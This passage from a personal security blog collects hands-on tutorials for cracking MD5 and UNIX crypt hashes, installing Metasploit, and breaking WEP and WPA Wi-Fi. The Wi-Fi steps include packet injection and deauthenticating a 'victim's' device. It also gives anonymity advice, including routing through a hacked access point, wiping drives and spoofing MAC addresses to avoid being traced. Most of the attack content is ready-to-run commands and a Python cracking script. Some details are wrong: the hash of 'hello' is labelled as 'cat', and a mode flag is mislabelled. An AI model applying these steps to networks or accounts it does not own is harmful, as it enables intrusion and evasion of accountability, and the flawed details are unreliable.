Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Sunday, 6 September 2015

How to crack MD5 hashes with hashcat

OS: Ubuntu 15.04

There is also a GPU version (oclhashcat), but I am on my notebook so I have to use the CPU only version, which - of course - is much slower.

Download the latest hashcat version here: https://hashcat.net/hashcat/

Download a wordlist: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

Create a MD5 hash: E.g.: 'hello'

echo -n "hello" | md5sum
5d41402abc4b2a76b9719d911017c592

Next, extract the hashcat archive and create a .txt file with the md5 hash(es) within the folder. Also, save the wordlist in the hashcat folder.

Start hashcat. Dictionary based attack.


Command:

./hashcat-cli64.bin -n 2 -m 0 -a 8  test.txt realhuman_phill.txt

-n,   --threads=NUM                 Number of threads
-m,  --hash-type=NUM              Hash-type
-a,  --attack-mode=NUM          Attack-mode

--> use ./hashcat-cli64.bin -h to display all available options.

test.txt is the file with the md5 hash(es) and realhuman_phill.txt is the wordlist.

Wait...


hashcat will create a filed named hashcat.pot which contains successfully cracked hashes. You can display its contents with cat:

user@user:~/Desktop/hashcat-0.50$ cat '/home/user/Desktop/hashcat-0.50/hashcat.pot'
5d41402abc4b2a76b9719d911017c592:hello

There you go: hello. 

Brute-force


If you want to read about brute-force (masked) attack have a look here: http://www.unix-ninja.com/p/Exploiting_masks_in_Hashcat_for_fun_and_profit/

Quick example of a brute-force attack for the md5 hash 'cat': 5d41402abc4b2a76b9719d911017c592


./hashcat-cli64.bin -n 2 -m 0 -a 3 test.txt ?a?a?a

?a?a?a specifies to go through all character combinations exactly 3 characters long. ?l?l?l would be lower-case only:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a = ?l?u?d?s

Wednesday, 26 February 2014

How To Monitor Failed SSH Attempts

Disable Password Authentication for better Security

More about SSH can be found here.

You might be astonished how many people try to break into your computer via ssh. It is advisable to use key-based authentication only. Article for key-based authentication.

Enable monitoring

sudo gedit /etc/ssh/sshd_config
--> change LogLevel INFO to LogLevel VERBOSE

SSH login attempts will now be saved in your /var/log/auth.log file.

Accessing the information

sudo cat /var/log/auth.log | grep sshd
sudo cat /var/log/auth.log | grep Fail

sudo cat /var/log/auth.log | grep Invalid

Disabling SSH all-together

sudo mv /etc/init/ssh.conf /etc/init/ssh.conf.disabled

Tuesday, 21 January 2014

How to hash and crack UNIX passwords in python

Crypt module

I am using the crypt module here, which is a one-way hash function based upon a modified DES algorithm. You can easily adjust the script to crack secure hash algorithms (SHA1, SHA224, SHA256, SHA384, and SHA512 (defined in FIPS 180-2) as well as RSA’s MD5 algorithm ) by using the hashlib  module.

Crypt Overview

import crypt
crypt.crypt("user", "AD")
'AD5Qg2vQhsLRw'

AD is the salt, which is a random two-character string which will be used to perturb the DES algorithm in one of 4096 ways.

The python password cracking script

import crypt
def testPass(hashpass):
    salt = hashpass[0:2]
    dictionary = open('dictionary.txt', 'r') #this is our dictionary file
    for word in dictionary.readlines():
        word = word.strip('\n')
        crypto = crypt.crypt(word,salt)
        if crypto == hashpass:
            print "[+] Password: "+word+"\n"
            return
    print "[-] Password Not Found.\n"
    return

def main():
    hashpass = open('passwords.txt', 'r') #file with hashed password
    for line in hashpass.readlines():
        if ":" in line:
            user = line.split(':')[0]
            hashpass = line.split(':')[1].strip(' ')
            print "[*] Cracking Password For: "+user
            testPass(hashpass)
if __name__ == "__main__":
    main() 
 
Save the script as cracker.py.
You also need to create a dictionary.txt and password.txt  (with the hashed passwords) file to successfully run the program.

Create a new folder and put the three files into it, afterwards simply run 
python cracker.py

You can download all of the files here: Drive

Sunday, 12 January 2014

Installing Metasploit on Debian (or Ubuntu)














sudo su  

apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev  

apt-get install git-core postgresql curl ruby1.9.3 nmap gem  
gem install wirble sqlite3 bundler  

cd /opt  
git clone https://github.com/rapid7/metasploit-framework.git  

cd metasploit-framework  
bundle install  

./msfconsole  


msfconsole tutorial: click

Wednesday, 17 October 2012

How to be anonymous on the internet (99-100%)

Updated: 06/2016

Summary: Tor Browser is not enough. This short tutorial will help you to significantly improve your security in only 15 minutes. 

Your online privacy is under attack. Government agencies (NSA, FBI etc.) and private companies (e.g. Google) are snooping on you. You will find a lot of tips on the web to achieve online anonymity, but most of it is useless.

The information below will give you a rock-solid setup in a reasonable amount of time. If you run into any problems post a comment and I will help you out.

It is possible to avoid being tracked, but to stay anonymous online you need a) a good setup and b) use your common sense.

My setup | User -> VPN -> Tor -> Internet

Using Tor alone is often not enough as a Harvard student had to learn when he emailed a bomb threat to campus officials to avoid having to write a final exam.  He was deanonymized by the fact that he was the only person using Tor on the campus network at the time the email was sent.

A VPN will hide the fact that you are using Tor from your Internet service provider or the network you are connected to. Choosing a VPN which can be trusted is extremely important. Companies such as Hide My Ass will reveal your identity as soon as someone knocks on their door. Money spent on these kind of operators is completely wasted money.

Step 1: VPN

Find a good VPN provider. I am using NordVPN. Their servers are operated under the jurisdiction of Panama, they have a no logs policy and it is possible to pay in Bitcoins for their services.

After you have signed up, install OpenVPN or use NordVPNs software and connect to the NordVPN network or the network of your VPN provider of choice.

A VPN will add a layer of protection regardless of whether you decide to proceed with Step 2 or not.

Step 2: Virtual Environment and Tor

Next, download VirtualBox and Whonix-Workstation/Gateway, which is a security-focused Linux distribution that tunnels ALL traffic through Tor. Install VirtualBox.

How to be anonymous online

Open VirtualBox and import the two (!) .ova files (Whonix) into VirtualBox. To do this go to File --> Import Appliance .

How to be anonymous online

First start Whonix-Gateway.

How to be anonymous online

As soon as you see the Desktop of Whonix-Gateway go back to VirtualBox and start Whonix-Workstation. 

Everything you do (i.e. surfing the deep web) is done on Whonix-Workstation.

How to be anonymous online

Important: USE your brain.

The best possible setup won't help you if you are careless and login to your normal Facebook/Gmail account while hiding behind VPNs and Tor. Do not use your everyday email address and do not use your everyday username for any anonymous activity online.

Unfortunately people make mistakes, but by using a virtual environment (Whonix) you can greatly mitigate that risk. It will help you separate your two identities and thus stay truly anonymous online.

If you have any questions or problems, please write a comment below.


EXTRA (You don't need this)
Please be aware that the following is of theoretical nature only. Breaking into networks without consent is illegal.

In theory the following setup would make it impossible to track somebody down: User --> hacked Wireless Access Point Router --> VPN --> Tor (Whonix) --> Internet

Don't use Windows, but a clean install of Debian instead. Make sure you enable full disk encryption (password should be a minimum of 30 characters).

Securely erase your HDD: Boot from an Ubuntu live CD. Install wipe (sudo apt-get install wipe) and wipe the hard disk drive.

·         WEP poses a significant security risk http://ubuntu-skype.blogspot.co.at/2012/08/how-to-crack-wep-with-aircrack-ng.html


Adversary most likely will change his mac address. This can be done via macchanger.  e.g. macchanger -r wlan0



Tuesday, 11 September 2012

Brute forcing WPA/WPA2 handshake with john the ripper

Please refer to this article for a tutorial on how to obtain a handshake.

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5) 

The limitation of a dictionary attack is that unless the password is in your dictionary file, your attack won't be successful. Another way to obtain the password is to brute force it with john the ripper. In theory it is possible to crack ANY password with this method, but it might take a million years to crack a full 128 ASCII characters password with your computer.

Ok, the command:

This was on Backtrack
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)

Debian
sudo apt-get install john
/usr/sbin/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)


By default john will only try passwords with 8 characters or less. However, the minimum  pass-phrase length for WPA is 8.You need to edit the john.conf file to change the max length of the output.

"--inrecemtal:all" means that john will try all 128 ASCII characters, which will  take thousand of years to complete if the password has a proper lenght. You can also try -i:digits for numbers only or -i:alpha for a to z.

Good luck.

P.S.: You might be interested in this simple Linux dictionary password cracker written in python:  Article

Tuesday, 14 August 2012

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I' ll get back to you.

Requirements
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode. It wont work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H . It is cheap, reliable and works out of the box.

Commands
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger -m 00:11:22:33:44:55 wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0 
  6. ifconfig mon0 down
  7. macchanger -r (random mac) mon0
  8. ifconfig mon0 up
  9. airodump-ng mon0 (scan for APs)
  10. Wait for a minute
  11. CTRL + C (stop scanning)
  12. Pick your own AP with WEP encryption
  13. airodump-ng -c (channel) -w (filename) —bssid (xx:xx:xx:xx:xx:xx) mon0
    • -w file, in which the data will be saved.
  14. —You need around 10k of data to successfully crack WEP—
  15. Open another console
  16. aireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0
  17. Wait for ”Association succcessful”
  18. aireplay-ng -3 -b (BSSID) -e (ESSID) mon0 (starts the injection)
    • data in the other console should now  increase significantly
  19. open another console
  20. aircrack-ng (filename.cap) 
    •  path to the file from step 13. e.g. ~/Desktop/test.cap
  21. Wait for —Key Found—
  22. Enter Key without ‘:’.
This can be done in approx. 10 minutes. Have fun!

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5)

What you need

  • Backtrack (or Linux with aircrack-ng installed)
  • Virtual machine (e.g. Vmware or Virtualbox)
  • Password list
  • USB Wifi adapter capable of promiscuous mode: Alfa AWUS036H



Alright, fire up the terminal.

Commands

  1. airmon-ng
  2. airmon-ng start wlan0
  3. ifconfig mon0 down
  4. macchanger -m 00:11:22:33:44:55 mon0
  5. ifconfig mon0 up
  6. airodump-ng mon0 (let it scan for a minute)
  7. CTRL + C (stop)
  8. airodump-ng -c (channel) -w (filename. eg. wpa) —bssid (xx:xx:xx:xx:xx:xx) mon0

 Now, we need to deauthenticate a user's pc currently on the network (mac)

  1. open another console
  2. aireplay-ng --deauth 1 (just one!) -e (ESSID) -c  (victim's mac) mon0
  3. Wait for WPA handshake ==> airodump-ng
  4. —-all cracking can be done offline—-
  5. aircrack-ng -w (wordlist) file (eg. WPA-01.cap)
    • this is the file from step 8
Note: Success of attack depends on whether your word-list contains the password or not.

Video



Any problems? Ask!